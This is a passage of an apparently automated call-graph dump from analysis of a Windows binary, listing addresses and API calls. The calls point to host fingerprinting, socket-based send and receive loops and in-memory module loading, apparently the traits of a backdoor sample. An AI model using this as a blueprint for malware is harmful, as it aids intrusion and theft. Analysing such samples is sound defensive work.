18384->18385 18385->18377 18388 e15ba1 wnsprintfW wnsprintfW 18386->18388 18389 e15bec 18386->18389 18387->18385 18388->18385 18390 e15bf3 wnsprintfW wnsprintfW 18389->18390 18391 e15c3e 18389->18391 18390->18385 18392 e15c90 18391->18392 18393 e15c45 wnsprintfW wnsprintfW 18391->18393 18394 e15ce2 18392->18394 18395 e15c97 wnsprintfW wnsprintfW 18392->18395 18393->18385 18396 e15d34 18394->18396 18397 e15ce9 wnsprintfW wnsprintfW 18394->18397 18395->18385 18398 e15d86 18396->18398 18399 e15d3b wnsprintfW wnsprintfW 18396->18399 18397->18385 18400 e15dd8 18398->18400 18401 e15d8d wnsprintfW wnsprintfW 18398->18401 18399->18385 18402 e15e2a 18400->18402 18403 e15ddf wnsprintfW wnsprintfW 18400->18403 18401->18385 18404 e15e31 wnsprintfW wnsprintfW 18402->18404 18405 e15e7c 18402->18405 18403->18385 18404->18385 18406 e15e83 wnsprintfW wnsprintfW 18405->18406 18407 e15ece 18405->18407 18406->18385 18408 e15f20 18407->18408 18409 e15ed5 wnsprintfW wnsprintfW 18407->18409 18410 e15f72 18408->18410 18411 e15f27 wnsprintfW wnsprintfW 18408->18411 18409->18385 18412 e15fc4 18410->18412 18413 e15f79 wnsprintfW wnsprintfW 18410->18413 18411->18385 18414 e16016 18412->18414 18415 e15fcb wnsprintfW wnsprintfW 18412->18415 18413->18385 18416 e16068 18414->18416 18417 e1601d wnsprintfW wnsprintfW 18414->18417 18415->18385 18418 e160ba 18416->18418 18419 e1606f wnsprintfW wnsprintfW 18416->18419 18417->18385 18420 e160c1 wnsprintfW wnsprintfW 18418->18420 18421 e1610c 18418->18421 18419->18385 18420->18385 18422 e16113 wnsprintfW wnsprintfW 18421->18422 18423 e1615e 18421->18423 18422->18385 18424 e161b0 18423->18424 18425 e16165 wnsprintfW wnsprintfW 18423->18425 18426 e16202 18424->18426 18427 e161b7 wnsprintfW wnsprintfW 18424->18427 18425->18385 18428 e16254 18426->18428 18429 e16209 wnsprintfW wnsprintfW 18426->18429 18427->18385 18430 e162a6 18428->18430 18431 e1625b wnsprintfW wnsprintfW 18428->18431 18429->18385 18432 e162f8 18430->18432 18433 e162ad wnsprintfW wnsprintfW 18430->18433 18431->18385 18434 e1634a 18432->18434 18435 e162ff wnsprintfW wnsprintfW 18432->18435 18433->18385 18436 e16351 wnsprintfW wnsprintfW 18434->18436 18437 e1639c 18434->18437 18435->18385 18436->18385 18438 e163a3 wnsprintfW wnsprintfW 18437->18438 18439 e163eb 18437->18439 18438->18385 18440 e163f2 wnsprintfW wnsprintfW 18439->18440 18441 e1643a LocalFree LocalFree LocalFree 18439->18441 18440->18385 18441->18377 18453 e20990 LocalAlloc 18442->18453 18444 e210e5 VirtualFree 18445 e210f8 18444->18445 18445->18236 18446 e20eea LoadLibraryA 18448 e20d79 18446->18448 18452 e20d86 18446->18452 18447 e2108b 18461 e20540 LocalAlloc 18447->18461 18448->18446 18448->18447 18450 e20fe7 GetProcAddress 18448->18450 18451 e20f8a GetProcAddress 18448->18451 18448->18452 18450->18448 18450->18452 18451->18448 18451->18452 18452->18444 18452->18445 18454 e20a15 18453->18454 18455 e20a1c und_memcpy 18453->18455 18454->18448 18456 e20a5a VirtualAlloc 18455->18456 18457 e20a92 LocalFree 18456->18457 18458 e20aa7 und_memcpy 18456->18458 18457->18454 18459 e20cd5 LocalFree 18458->18459 18460 e20bc3 und_memcpy 18458->18460 18459->18454 18460->18448 18462 e205a8 18461->18462 18465 e205af und_memcpy 18461->18465 18462->18452 18463 e20948 LocalFree 18463->18462 18468 e2088f 18463->18468 18464 e20968 LocalFree 18464->18462 18465->18463 18466 e2085c VirtualProtect 18465->18466 18467 e20899 18466->18467 18466->18468 18467->18463 18468->18462 18468->18464 18470 e17ec8 18469->18470 18471 e17dcd 18469->18471 18476 e17f50 LocalAlloc 18470->18476 18477 e17e03 _snprintf wmemmove 18470->18477 18472 e17dd7 lstrlenW 18471->18472 18473 e17e49 lstrlenW LocalAlloc 18471->18473 18472->18477 18474 e17e97 wmemmove 18473->18474 18475 e17e9e lstrcpyW 18473->18475 18474->18477 18475->18477 18476->18474 18477->18255 18478->18265 18479->18267 18480->18269 18481->18271 18482->18273 18483->18275 18484->18277 18485->18279 18500 e13290 18486->18500 18490 e1307d 18490->18283 18577 e13130 18491->18577 18495 e1337b 18494->18495 18495->18314 18496->18316 18497->18324 18498->18326 18499->18328 18505 e28f00 18500->18505 18503 e13170 SysAllocString 18504 e131b5 18503->18504 18504->18490 18508 e28f0b 18505->18508 18506 e2c678 malloc 62 API calls 18506->18508 18507 e13061 18507->18490 18507->18503 18508->18506 18508->18507 18509 e2c738 _callnewh DecodePointer 18508->18509 18512 e28f2a _DebugMallocator 18508->18512 18509->18508 18510 e28f7b 18522 e29174 18510->18522 18512->18510 18519 e2c660 18512->18519 18516 e28fa2 18528 e2c76c 18516->18528 18537 e2c554 18519->18537 18551 e290e4 18522->18551 18525 e28e6c 18526 e28e9a wmemmove 18525->18526 18527 e28ed9 RaiseException 18526->18527 18527->18516 18529 e30b64 _lock 62 API calls 18528->18529 18531 e2c77f 18529->18531 18534 e2c4d0 free 62 API calls 18531->18534 18535 e2c7c3 18531->18535 18536 e2c7b3 18531->18536 18533 e2c4d0 free 62 API calls 18533->18535 18534->18536 18576 e30a64 LeaveCriticalSection 18535->18576 18536->18533 18550 e2e4f4 18537->18550 18552 e290f9 18551->18552 18556 e28f8c 18551->18556 18557 e2908c 18552->18557 18556->18525 18558 e290a4 18557->18558 18559 e2909b 18557->18559 18558->18556 18561 e29030 18558->18561 18560 e2c4d0 free 62 API calls 18559->18560 18560->18558 18562 e29035 _cftoe_l 18561->18562 18565 e29076 18561->18565 18563 e2c678 malloc 62 API calls 18562->18563 18564 e2905e 18563->18564 18564->18565 18567 e2c8a0 18564->18567 18565->18556 18568 e2c8ab 18567->18568 18569 e2c8b5 18567->18569 18568->18569 18574 e2c8d1 18568->18574 18570 e2a940 _errno 62 API calls 18569->18570 18571 e2c8bd 18570->18571 18572 e2a8d8 _invalid_parameter_noinfo 17 API calls 18571->18572 18573 e2c8c9 18572->18573 18573->18565 18574->18573 18575 e2a940 _errno 62 API calls 18574->18575 18575->18571 18578 e13144 18577->18578 18579 e08394 18577->18579 18581 e131e0 18578->18581 18579->18280 18579->18286 18582 e13235 18581->18582 18583 e1320a 18581->18583 18582->18579 18583->18582 18585 e13250 18583->18585 18588 e132b0 18585->18588 18587 e13267 18587->18582 18591 e132d0 18588->18591 18590 e132c3 18590->18587 18592 e132f2 18591->18592 18593 e132e4 SysFreeString 18591->18593 18592->18590 18593->18592 18597 e29332 _snprintf 18594->18597 18595 e29337 18596 e2a940 _errno 62 API calls 18595->18596 18599 e2933c 18596->18599 18597->18595 18598 e29356 18597->18598 18610 e2cafc 18598->18610 18601 e2a8d8 _invalid_parameter_noinfo 17 API calls 18599->18601 18603 e0ef64 SHGetKnownFolderPath 18601->18603 18603->18346 18603->18347 18604 e29934 write_char 82 API calls 18604->18603 18606 e0f128 18605->18606 18607 e1e543 CoCreateInstance 18605->18607 18606->18361 18606->18365 18608 e1e60a CoUninitialize 18607->18608 18609 e1e578 18607->18609 18608->18606 18609->18608 18611 e293ec _wincmdln 62 API calls 18610->18611 18612 e2cb67 18611->18612 18613 e2a940 _errno 62 API calls 18612->18613 18614 e2cb6c 18613->18614 18615 e2cba4 18614->18615 18616 e2cb78 18614->18616 18618 e3033c _fileno 62 API calls 18615->18618 18640 e2cbc1 _snprintf _cftoe_l 18615->18640 18617 e2a940 _errno 62 API calls 18616->18617 18620 e2cb7d 18617->18620 18618->18640 18619 e2cc2f 18622 e2a940 _errno 62 API calls 18619->18622 18621 e2a8d8 _invalid_parameter_noinfo 17 API calls 18620->18621 18623 e2cb88 18621->18623 18624 e2cc34 18622->18624 18626 e2c4b0 _fltout2 8 API calls 18623->18626 18625 e2a8d8 _invalid_parameter_noinfo 17 API calls 18624->18625 18625->18623 18627 e29386 18626->18627 18627->18603 18627->18604 18628 e308c0 _snprintf 62 API calls 18628->18640 18629 e2c9c8 82 API calls write_char 18629->18640 18630 e2a940 _errno 62 API calls 18631 e2d594 18630->18631 18633 e2a8d8 _invalid_parameter_noinfo 17 API calls 18631->18633 18632 e2d541 18632->18630 18633->18623 18634 e2d0f8 DecodePointer 18634->18640 18635 e2c4d0 free 62 API calls 18635->18640 18636 e3059c __setargv 62 API calls 18636->18640 18637 e310f0 64 API calls _snprintf 18637->18640 18638 e2d152 DecodePointer 18638->18640 18639 e2d172 DecodePointer 18639->18640 18640->18619 18640->18623 18640->18628 18640->18629 18640->18632 18640->18634 18640->18635 18640->18636 18640->18637 18640->18638 18640->18639 18641 e2ca64 82 API calls _snprintf 18640->18641 18642 e2ca10 82 API calls write_multi_char 18640->18642 18641->18640 18642->18640 18654 e291b0 18643->18654 18646 e1c271 CreateWindowExW 18649 e1c2e2 GetMessageW 18646->18649 18650 e1c32c 18646->18650 18647 e1c260 GetLastError 18647->18646 18648 e1c347 18647->18648 18651 e1c301 TranslateMessage DispatchMessageW 18649->18651 18652 e1c31f DestroyWindow 18649->18652 18650->18648 18653 e1c333 UnregisterClassW 18650->18653 18651->18649 18652->18650 18653->18648 18655 e1c21d RegisterClassW 18654->18655 18655->18646 18655->18647 18657 e25d51 18656->18657 18658 e2635e 18656->18658 18659 e25d63 OpenMutexW 18657->18659 18660 e25d7c 18657->18660 18659->18660 18661 e26340 18660->18661 18662 e25da3 18660->18662 18663 e25da7 OpenMutexW 18660->18663 18666 e26353 CloseHandle 18661->18666 18667 e26348 CloseHandle 18661->18667 18664 e25df2 CreateEventW 18662->18664 18668 e26322 18662->18668 18663->18661 18665 e25dcc WaitForSingleObject 18663->18665 18664->18668 18677 e25e1a 18664->18677 18665->18662 18665->18664 18666->18658 18667->18666 18668->18661 18669 e2632a ReleaseMutex CloseHandle 18668->18669 18669->18661 18670 e25e96 WaitForSingleObject 18671 e2629e WaitForSingleObject 18670->18671 18698 e25e89 18670->18698 18673 e262b2 SetEvent WaitForSingleObject 18671->18673 18674 e262cd 18671->18674 18672 e25e5f WaitForSingleObject 18672->18677 18678 e25e7d 18672->18678 18673->18674 18679 e262d5 CloseHandle 18674->18679 18680 e262e9 18674->18680 18675 e25ef0 SleepEx WaitForSingleObject 18683 e25f25 WaitForSingleObject 18675->18683 18675->18698 18676 e25eba WaitForSingleObject 18676->18675 18681 e25ed0 WaitForSingleObject 18676->18681 18677->18672 18677->18698 18682 e2630a CloseHandle 18678->18682 18679->18680 18684 e262f1 CloseHandle 18680->18684 18685 e26305 18680->18685 18686 e25ee9 18681->18686 18681->18698 18682->18668 18683->18698 18684->18685 18685->18682 18687 e26dd0 4 API calls 18685->18687 18686->18671 18687->18682 18688 e26287 WaitForSingleObject 18688->18698 18690 e25f84 setsockopt 18691 e25fb7 CreateEventW 18690->18691 18690->18698 18692 e25fdb LocalAlloc 18691->18692 18691->18698 18695 e26002 CreateThread 18692->18695 18696 e261f5 CloseHandle 18692->18696 18693 e26211 shutdown closesocket 18694 e2622c CloseHandle 18693->18694 18700 e26255 18694->18700 18695->18698 18699 e2604d GetTickCount 18695->18699 18985 e26370 18695->18985 18696->18698 18697 e2627b ExitProcess 18698->18670 18698->18671 18698->18675 18698->18676 18698->18686 18698->18688 18698->18690 18698->18693 18698->18694 18698->18696 18698->18697 18701 e261e7 LocalFree 18698->18701 18719 e26f30 18698->18719 18711 e26064 18699->18711 18700->18698 18701->18696 18702 e26173 shutdown closesocket SetEvent WaitForSingleObject 18737 e26dd0 18702->18737 18704 e26096 WaitForSingleObject 18707 e260b1 WaitForSingleObject 18704->18707 18704->18711 18705 e2607b WaitForSingleObject 18705->18704 18705->18711 18707->18711 18710 e261c8 CloseHandle 18710->18698 18711->18702 18711->18704 18711->18705 18712 e26104 WSAGetLastError 18711->18712 18714 e26163 SleepEx 18711->18714 18715 e26135 GetTickCount 18711->18715 18736 e23370 recv 18711->18736 18712->18711 18713 e26111 GetTickCount 18712->18713 18716 e26125 18713->18716 18714->18711 18717 e26142 18715->18717 18716->18702 18716->18711 18717->18714 18747 e23370 recv 18717->18747 18720 e26fd0 18719->18720 18721 e26f44 18719->18721 18722 e26fdd WaitForMultipleObjects WaitForSingleObject 18720->18722 18728 e27128 18720->18728 18760 e251b0 lstrlenW 18721->18760 18724 e27028 ReleaseMutex 18722->18724 18726 e2703c 18722->18726 18724->18728 18725 e26f99 18725->18720 18727 e26fa6 lstrcpyA 18725->18727 18726->18728 18729 e27064 lstrcpyA ReleaseMutex 18726->18729 18730 e27119 ReleaseMutex 18726->18730 18727->18728 18728->18698 18731 e251b0 213 API calls 18729->18731 18732 e27117 SetEvent 18730->18732 18733 e270e4 18731->18733 18732->18728 18733->18732 18735 e270f1 lstrcpyA 18733->18735 18735->18728 18736->18711 18738 e26de8 18737->18738 18739 e26e47 18738->18739 18740 e26e2c SetEvent 18738->18740 18745 e261c3 18738->18745 18741 e26e7f 18739->18741 18742 e26e5f WaitForSingleObject 18739->18742 18740->18739 18743 e26eb2 18741->18743 18744 e26e97 CloseHandle 18741->18744 18742->18741 18743->18745 18746 e26eca CloseHandle 18743->18746 18744->18743 18748 e13ae0 18745->18748 18746->18745 18747->18717 18750 e13aee 18748->18750 18749 e13dcd 18749->18710 18750->18749 18751 e13b3e 18750->18751 18758 e13cd4 18750->18758 18752 e13b95 18751->18752 18753 e13b68 SetEvent 18751->18753 18754 e13bc3 WaitForSingleObject CloseHandle 18752->18754 18755 e13c4d 18752->18755 18753->18752 18754->18755 18756 e13c77 CloseHandle 18755->18756 18757 e13ccf 18755->18757 18756->18757 18757->18710 18758->18749 18759 e13d8b VirtualFree 18758->18759 18759->18749 18800 e257b0 18760->18800 18762 e25719 und_memcpy 18762->18725 18766 e252af setsockopt 18767 e252fa 18766->18767 18768 e25778 shutdown closesocket 18766->18768 18866 e24c90 18767->18866 18768->18762 18773 e24c90 10 API calls 18774 e253e5 18773->18774 18774->18768 18775 e24740 10 API calls 18774->18775 18776 e25430 18775->18776 18776->18768 18777 e24c90 10 API calls 18776->18777 18778 e25494 18777->18778 18778->18768 18902 e25bb0 LocalAlloc 18778->18902 18781 e24c90 10 API calls 18782 e254fb 18781->18782 18783 e2576a LocalFree 18782->18783 18784 e24740 10 API calls 18782->18784 18783->18768 18785 e25548 18784->18785 18785->18783 18786 e24c90 10 API calls 18785->18786 18787 e255ac 18786->18787 18787->18783 18914 e259a0 LocalAlloc 18787->18914 18790 e24c90 10 API calls 18791 e25613 18790->18791 18792 e2575c LocalFree 18791->18792 18793 e24740 10 API calls 18791->18793 18792->18783 18794 e25660 18793->18794 18794->18792 18795 e24740 10 API calls 18794->18795 18796 e256b9 18795->18796 18796->18792 18797 e256d3 CreateEventW 18796->18797 18797->18792 18798 e256f9 WSAEventSelect 18797->18798 18798->18762 18799 e2574e CloseHandle 18798->18799 18799->18792 18929 e21f90 18800->18929 18803 e2520e 18803->18762 18810 e23b40 socket 18803->18810 18804 e257e8 CoCreateGuid 18805 e258d4 CoUninitialize 18804->18805 18806 e257fb StringFromGUID2 18804->18806 18805->18803 18806->18805 18807 e25819 wsprintfA LocalAlloc 18806->18807 18807->18805 18808 e25856 und_memcpy 18807->18808 18809 e258b9 LocalFree CoUninitialize 18808->18809 18809->18803 18811 e23b84 WSAGetLastError WSACreateEvent 18810->18811 18812 e23b7d 18810->18812 18813 e23ba7 WSAEventSelect 18811->18813 18814 e23b9d 18811->18814 18812->18762 18812->18766 18816 e23bcb 18813->18816 18864 e23bc1 18813->18864 18815 e2417c shutdown closesocket 18814->18815 18815->18812 18818 e23bdb 18816->18818 18819 e23dee 18816->18819 18817 e24171 CloseHandle 18817->18815 18822 e23be7 18818->18822 18823 e23bf4 inet_addr 18818->18823 18820 e23e15 inet_addr 18819->18820 18821 e23e05 18819->18821 18824 e23e79 htons connect 18820->18824 18825 e23e34 gethostbyname 18820->18825 18821->18824 18826 e23c46 htons connect 18822->18826 18823->18826 18827 e23c0d gethostbyname 18823->18827 18824->18817 18829 e23ecc WSAGetLastError 18824->18829 18825->18821 18825->18864 18828 e23c8a WSAGetLastError 18826->18828 18826->18864 18830 e23c28 18827->18830 18827->18864 18831 e23c9b WSAWaitForMultipleEvents 18828->18831 18828->18864 18829->18817 18832 e23edd WSAWaitForMultipleEvents 18829->18832 18830->18826 18835 e23d19 18831->18835 18836 e23cfc WSACloseEvent closesocket 18831->18836 18837 e23f70 WSACloseEvent closesocket 18832->18837 18838 e23f59 18832->18838 18839 e23d23 WSACloseEvent closesocket 18835->18839 18840 e23d40 18835->18840 18836->18812 18837->18812 18838->18837 18841 e23f8d 18838->18841 18839->18812 18842 e23d47 WSAEnumNetworkEvents 18840->18842 18843 e23dc5 18840->18843 18841->18817 18845 e23f9b WSAEnumNetworkEvents 18841->18845 18846 e23d60 closesocket WSACloseEvent 18842->18846 18847 e23d7d 18842->18847 18844 e23dcc closesocket WSACloseEvent 18843->18844 18843->18864 18844->18812 18848 e23fb7 WSACloseEvent closesocket 18845->18848 18849 e23fd4 18845->18849 18846->18812 18850 e23da5 18847->18850 18851 e23d88 closesocket WSACloseEvent 18847->18851 18848->18812 18852 e23ffb 18849->18852 18853 e23fde WSACloseEvent closesocket 18849->18853 18850->18843 18854 e23db0 WSACloseEvent 18850->18854 18851->18812 18855 e24022 inet_addr 18852->18855 18856 e24007 18852->18856 18853->18812 18854->18812 18855->18856 18857 e24067 18856->18857 18858 e240ea 18856->18858 18931 e241b0 LocalAlloc 18857->18931 18858->18817 18945 e24340 LocalAlloc 18858->18945 18863 e240d0 CloseHandle 18863->18812 18864->18817 18865 e2415f CloseHandle 18865->18812 18865->18817 18867 e24cb4 18866->18867 18868 e24cd9 18866->18868 18977 e233b0 send 18867->18977 18870 e24d20 WSACreateEvent 18868->18870 18871 e24cd4 18868->18871 18870->18871 18879 e24d46 18870->18879 18871->18768 18884 e24740 18871->18884 18872 e2517e CloseHandle 18872->18871 18873 e24df7 WaitForSingleObject 18873->18879 18875 e24eb6 WaitForSingleObject 18875->18879 18876 e24fa9 WSAGetLastError 18877 e24fba WSAEventSelect 18876->18877 18883 e24e58 18876->18883 18878 e24ff0 WSAWaitForMultipleEvents 18877->18878 18877->18883 18878->18879 18878->18883 18879->18873 18879->18875 18879->18876 18880 e250f3 WSAEnumNetworkEvents 18879->18880 18881 e25070 18879->18881 18879->18883 18978 e233b0 send 18879->18978 18880->18879 18880->18883 18882 e2509d WaitForSingleObject 18881->18882 18881->18883 18882->18881 18883->18871 18883->18872 18885 e24764 18884->18885 18886 e24789 18884->18886 18980 e23370 recv 18885->18980 18888 e247d0 WSACreateEvent 18886->18888 18889 e24784 18886->18889 18888->18889 18898 e247f6 18888->18898 18889->18768 18889->18773 18890 e24917 18890->18889 18891 e24c51 CloseHandle 18890->18891 18891->18889 18892 e248b6 WaitForSingleObject 18892->18898 18894 e24975 WaitForSingleObject 18894->18898 18895 e24a7c WSAGetLastError 18895->18890 18896 e24a8d WSAEventSelect 18895->18896 18896->18890 18897 e24ac3 WSAWaitForMultipleEvents 18896->18897 18897->18890 18897->18898 18898->18890 18898->18892 18898->18894 18898->18895 18899 e24bc6 WSAEnumNetworkEvents 18898->18899 18901 e24b43 18898->18901 18979 e23370 recv 18898->18979 18899->18890 18899->18898 18900 e24b70 WaitForSingleObject 18900->18901 18901->18890 18901->18900 18903 e25bd8 lstrcpyW 18902->18903 18913 e254a5 18902->18913 18904 e1ddc0 3 API calls 18903->18904 18905 e25c10 GetModuleFileNameW 18904->18905 18906 e25c41 18905->18906 18907 e25c2f LocalFree 18905->18907 18908 e25c77 lstrlenW 18906->18908 18909 e25c65 LocalFree 18906->18909 18907->18913 18910 e25cbc GetCurrentProcessId wnsprintfW 18908->18910 18911 e25cad LocalFree 18908->18911 18909->18913 18981 e08eb0 18910->18981 18911->18913 18913->18768 18913->18781 18915 e255bd 18914->18915 18916 e259c8 LoadLibraryW 18914->18916 18915->18783 18915->18790 18917 e259e2 LocalFree 18916->18917 18918 e259f4 GetProcAddress 18916->18918 18917->18915 18919 e25a13 LocalFree 18918->18919 18920 e25a25 _snprintf 18918->18920 18919->18915 18921 e25a37 RtlGetVersion 18920->18921 18922 e25a60 GetUserGeoID gethostname 18921->18922 18923 e25a4e LocalFree 18921->18923 18924 e25b86 LocalFree 18922->18924 18925 e25ad7 gethostbyname 18922->18925 18923->18915 18924->18915 18925->18924 18926 e25afc GetComputerNameExW 18925->18926 18926->18924 18927 e25b43 GetUserNameW 18926->18927 18927->18924 18928 e25b6d GetTickCount64 18927->18928 18928->18915 18930 e21fa6 CoInitializeEx 18929->18930 18930->18803 18930->18804 18932 e240c8 18931->18932 18933 e24227 htons 18931->18933 18932->18863 18932->18864 18959 e24620 WSACreateEvent 18933->18959 18936 e24327 LocalFree 18936->18932 18938 e24295 18938->18936 18967 e24500 WSACreateEvent 18938->18967 18942 e242da 18942->18936 18943 e242fc und_memcpy 18942->18943 18944 e24318 LocalFree 18943->18944 18944->18932 18946 e24157 18945->18946 18947 e243b9 htons wsprintfA 18945->18947 18946->18817 18946->18865 18948 e24620 5 API calls 18947->18948 18949 e2442a 18948->18949 18950 e244dd LocalFree 18949->18950 18975 e233b0 send 18949->18975 18950->18946 18952 e2444d 18952->18950 18953 e24500 5 API calls 18952->18953 18954 e24470 18953->18954 18954->18950 18976 e23370 recv 18954->18976 18956 e24490 18956->18950 18957 e244b2 und_memcpy 18956->18957 18958 e244ce LocalFree 18957->18958 18958->18946 18960 e2464f WSAEventSelect 18959->18960 18964 e24271 18959->18964 18961 e24724 WSACloseEvent 18960->18961 18962 e2466d WSAWaitForMultipleEvents WSACloseEvent 18960->18962 18961->18964 18962->18964 18965 e246df 18962->18965 18964->18936 18966 e233b0 send 18964->18966 18965->18961 18965->18964 18966->18938 18968 e2452f WSAEventSelect 18967->18968 18972 e242ba 18967->18972 18969 e24604 WSACloseEvent 18968->18969 18970 e2454d WSAWaitForMultipleEvents WSACloseEvent 18968->18970 18969->18972 18970->18972 18973 e245bf 18970->18973 18972->18936 18974 e23370 recv 18972->18974 18973->18969 18973->18972 18974->18942 18975->18952 18976->18956 18977->18871 18978->18879 18979->18898 18980->18889 18982 e28378 89 API calls 18981->18982 18983 e08ed9 RegGetValueW 18982->18983 18984 e08f24 18983->18984 18984->18913 18994 e263d1 18985->18994 18986 e26b7f WaitForSingleObject 18986->18994 18987 e2641c WaitForSingleObject 18987->18986 18987->18994 18988 e267e2 WaitForMultipleObjects 18991 e26482 18988->18991 18988->18994 18989 e2646b WaitForSingleObject 18989->18991 18989->18994 18990 e26d70 18996 e26d7b shutdown closesocket 18990->18996 18997 e26da8 LocalFree 18990->18997 18991->18990 18995 e26ce9 shutdown closesocket 18991->18995 18999 e26d41 CloseHandle 18991->18999 18992 e26c79 shutdown closesocket 18992->18994 18993 e26be7 shutdown closesocket 18993->18994 18994->18986 18994->18987 18994->18988 18994->18989 18994->18991 18994->18992 18994->18993 18998 e26c3f CloseHandle 18994->18998 19000 e264ac WaitForSingleObject 18994->19000 19001 e23b40 62 API calls 18994->19001 19002 e2687a WaitForSingleObject 18994->19002 19004 e26537 setsockopt 18994->19004 19007 e267ac shutdown closesocket 18994->19007 19009 e24c90 10 API calls 18994->19009 19010 e268ff shutdown closesocket CloseHandle 18994->19010 19011 e26985 recv 18994->19011 19017 e24740 10 API calls 18994->19017 19018 e2671c WSACreateEvent 18994->19018 18995->18991 18996->18997 18998->18994 18999->18991 19000->18994 19001->18994 19002->18991 19003 e26898 WaitForSingleObject 19002->19003 19003->18994 19005 e268bb WSAEnumNetworkEvents 19003->19005 19006 e26582 setsockopt 19004->19006 19004->19007 19005->18994 19008 e26b06 shutdown closesocket CloseHandle 19005->19008 19006->18994 19006->19007 19007->18994 19008->18994 19009->18994 19010->18994 19012 e26a95 shutdown closesocket CloseHandle 19011->19012 19016 e269c3 19011->19016 19012->18994 19014 e26a24 shutdown closesocket CloseHandle 19014->19016 19015 e269e4 CloseHandle 19015->19016 19016->18994 19016->19014 19016->19015 19022 e22660 19016->19022 19017->18994 19018->19007 19019 e26735 WSAEventSelect 19018->19019 19020 e26755 19019->19020 19021 e2678a CloseHandle 19019->19021 19020->19021 19021->19007 19023 e22b27 19022->19023 19025 e226aa 19022->19025 19024 e22b4a setsockopt 19023->19024 19043 e22b9e 19023->19043 19026 e22b88 19024->19026 19024->19043 19027 e2270a 19025->19027 19028 e228ed WaitForSingleObject 19025->19028 19075 e2287d 19025->19075 19031 e16790 110 API calls 19026->19031 19029 e22722 CloseHandle 19027->19029 19030 e22756 19027->19030 19032 e22915 19028->19032 19029->19030 19035 e227a2 CreateEventW 19030->19035 19036 e2276e CloseHandle 19030->19036 19038 e22b91 19031->19038 19033 e2293b CloseHandle 19032->19033 19034 e2296f 19032->19034 19032->19075 19033->19034 19039 e22987 CloseHandle 19034->19039 19040 e229bb CreateEventW 19034->19040 19041 e227c6 CreateThread 19035->19041 19035->19075 19036->19035 19037 e22c1e setsockopt 19042 e22c5c 19037->19042 19037->19075 19038->19043 19086 e16d00 19038->19086 19039->19040 19044 e229df CreateThread 19040->19044 19040->19075 19045 e22892 CloseHandle 19041->19045 19046 e2281c ResumeThread 19041->19046 19121 e233b0 send 19042->19121 19043->19037 19053 e22c9e 19043->19053 19043->19075 19049 e22a35 ResumeThread 19044->19049 19050 e22aab CloseHandle 19044->19050 19045->19075 19051 e22887 CloseHandle 19046->19051 19046->19075 19055 e22aa0 CloseHandle 19049->19055 19049->19075 19050->19075 19051->19045 19052 e22c7f closesocket 19052->19075 19056 e22d17 19053->19056 19061 e22d4b 19053->19061 19053->19075 19055->19050 19122 e23160 19056->19122 19057 e22bbc 19120 e233b0 send 19057->19120 19060 e22bdf closesocket 19060->19075 19062 e22de0 19061->19062 19063 e22f51 WaitForSingleObject 19061->19063 19061->19075 19066 e22e11 19062->19066 19067 e22def CloseHandle 19062->19067 19064 e22f70 19063->19064 19065 e22f7e 19063->19065 19064->19065 19068 e230ec 19064->19068 19069 e22faf 19065->19069 19070 e22f8d CloseHandle 19065->19070 19071 e22e42 CreateEventW 19066->19071 19072 e22e20 CloseHandle 19066->19072 19067->19066 19068->19075 19135 e233b0 send 19068->19135 19073 e22fe0 CreateEventW 19069->19073 19074 e22fbe CloseHandle 19069->19074 19070->19069 19071->19075 19076 e22e6c CreateThread 19071->19076 19072->19071 19073->19075 19079 e2300a CreateThread 19073->19079 19074->19073 19075->19016 19077 e22ea7 ResumeThread 19076->19077 19078 e22f0e CloseHandle 19076->19078 19077->19075 19081 e22f00 CloseHandle 19077->19081 19078->19075 19082 e23045 ResumeThread 19079->19082 19083 e230ac CloseHandle 19079->19083 19081->19078 19082->19075 19085 e2309e CloseHandle 19082->19085 19083->19075 19084 e2311f closesocket 19084->19075 19085->19083 19087 e16d18 19086->19087 19088 e16d1d 19087->19088 19089 e0f790 6 API calls 19087->19089 19088->19043 19088->19057 19090 e16d35 19089->19090 19090->19088 19091 e15a80 72 API calls 19090->19091 19092 e16d6e 19091->19092 19093 e16d77 LocalAlloc 19092->19093 19094 e17286 LocalFree 19092->19094 19095 e17260 19093->19095 19096 e16d98 lstrcpyW StrStrIW 19093->19096 19094->19088 19097 e17273 19095->19097 19098 e17268 LocalFree 19095->19098 19099 e28378 89 API calls 19096->19099 19097->19094 19100 e1727b LocalFree 19097->19100 19098->19097 19101 e16df4 RegGetValueW 19099->19101 19100->19094 19102 e16e43 LocalAlloc 19101->19102 19103 e17255 LocalFree 19101->19103 19102->19103 19104 e16e8d RegGetValueW 19102->19104 19103->19095 19105 e17247 LocalFree 19104->19105 19106 e16ed5 19104->19106 19105->19103 19107 e20d00 12 API calls 19106->19107 19108 e16fa8 19107->19108 19108->19105 19109 e16fe7 LocalAlloc 19108->19109 19114 e171f2 19108->19114 19110 e1700e LocalAlloc 19109->19110 19109->19114 19111 e17035 wmemmove 19110->19111 19112 e171e4 LocalFree 19110->19112 19113 e1704f lstrcpyW lstrcpyW lstrcpyW 19111->19113 19112->19114 19117 e17102 19113->19117 19114->19105 19115 e17231 VirtualFree 19114->19115 19115->19105 19116 e171d6 LocalFree 19116->19112 19117->19116 19118 e17158 LocalFree LocalFree LocalFree 19117->19118 19118->19088 19120->19060 19121->19052 19123 e23199 19122->19123 19124 e231a4 WaitForSingleObject 19123->19124 19126 e232d7 19123->19126 19125 e231ca 19124->19125 19125->19126 19127 e23219 19125->19127 19128 e231fd CloseHandle 19125->19128 19126->19075 19129 e23241 CreateEventW 19127->19129 19130 e23225 CloseHandle 19127->19130 19128->19127 19129->19126 19131 e23265 CreateThread 19129->19131 19130->19129 19132 e2329a ResumeThread 19131->19132 19133 e232e9 CloseHandle 19131->19133 19132->19126 19134 e232de CloseHandle 19132->19134 19133->19126 19134->19133 19135->19084 20140 e1908b 20141 e1909b 20140->20141 20142 e19193 LoadLibraryExW 20141->20142 20143 e190ad 20141->20143 20144 e191b3 20142->20144 20145 e191ba 20142->20145 20146 e19131 GetProcAddress 20143->20146 20147 e190b7 20143->20147 20150 e192d5 LoadLibraryW 20145->20150 20151 e191e9 20145->20151 20148 e19128 20146->20148 20149 e1918e 20146->20149 20152 e190e4 GetProcAddress 20147->20152 20148->20144 20149->20142 20150->20144 20153 e192f6 20150->20153 20154 e19270 GetProcAddress 20151->20154 20155 e191f3 20151->20155 20152->20148 20156 e1912f 20152->20156 20159 e19325 20153->20159 20160 e1940b LoadLibraryW 20153->20160 20154->20148 20157 e192d0 20154->20157 20158 e19220 GetProcAddress 20155->20158 20156->20149 20157->20150 20158->20148 20161 e1926e 20158->20161 20162 e193a9 GetProcAddress 20159->20162 20163 e1932f 20159->20163 20160->20144 20164 e19432 